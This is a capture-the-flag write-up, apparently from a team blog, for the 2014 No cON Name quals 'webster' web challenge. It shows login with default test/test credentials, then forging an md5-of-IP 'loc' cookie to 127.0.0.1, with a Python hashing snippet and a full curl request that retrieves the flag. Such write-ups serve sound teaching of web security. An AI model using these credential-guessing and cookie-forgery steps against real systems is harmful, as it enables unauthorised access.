This year's “No cON Name Capture The Flag” quals had more than three challenges to compete for the final, so big thanks to the organizers for extending last year's limit. As of now (09:27 am GMT+2), @DefCon-UA (the dcua team) has finished all the challenges, with 12+ hours still left before the competition ends. So it's time to draft some web write-ups.

(Screenshot: all challenges finished)

First, the “webster” 200-point web challenge shows us a login form. After multiple SQLi, XPath, LDAP… injection attempts with no luck, we tried logging in with common accounts.

Username ‘test’ with password ‘test’ was the lucky one that gave access to the main private area.

(Screenshot: private area)


We have id, filename, location and username for 4 files, where Captain Obvious says flag.txt is our target file. But not so fast: something is blocking our attempts to read this file. It says:

"Seems that you are not in the right place for that"

So am I not in the right place? Where could we go to get permissions on that file? Look at the cookies, and pay close attention to the one called ‘loc’:

(Screenshot, 2014-09-14 10:41:31: the ‘loc’ cookie)


Oh! It looks like an md5 of something we can't identify on the first try. But wait, maybe location means IP? Let's try with the one that appears in the location column:

>>> import hashlib
>>> ip='10.128.29.136'
>>> hashlib.md5(ip).hexdigest()   # Python 2: str is bytes, so no .encode() needed
'c869d000ef5c6fdfa128b058d2865512'

Yes! It's the same IP in hashed form, so can you figure out the rest? The server decides whether we are “in the right place” from a cookie that we control. Let's replace this cookie with the md5 of 127.0.0.1 (f528764d624db129b32c21fbca0cb8d6) as our location.

$ curl -vvv -k 'https://ctf.noconname.org/webster/content.php?op=4' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to ctf.noconname.org port 443 (#0)
*   Trying 88.87.208.202...
* Connected to ctf.noconname.org (88.87.208.202) port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: ctf.noconname.org
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host: ctf.noconname.org
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
>
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000

NCN_f528764d624db129b32c21fbca0cb8d6

flag: NCN_f528764d624db129b32c21fbca0cb8d6

PS: Thanks to my dcua teammates.



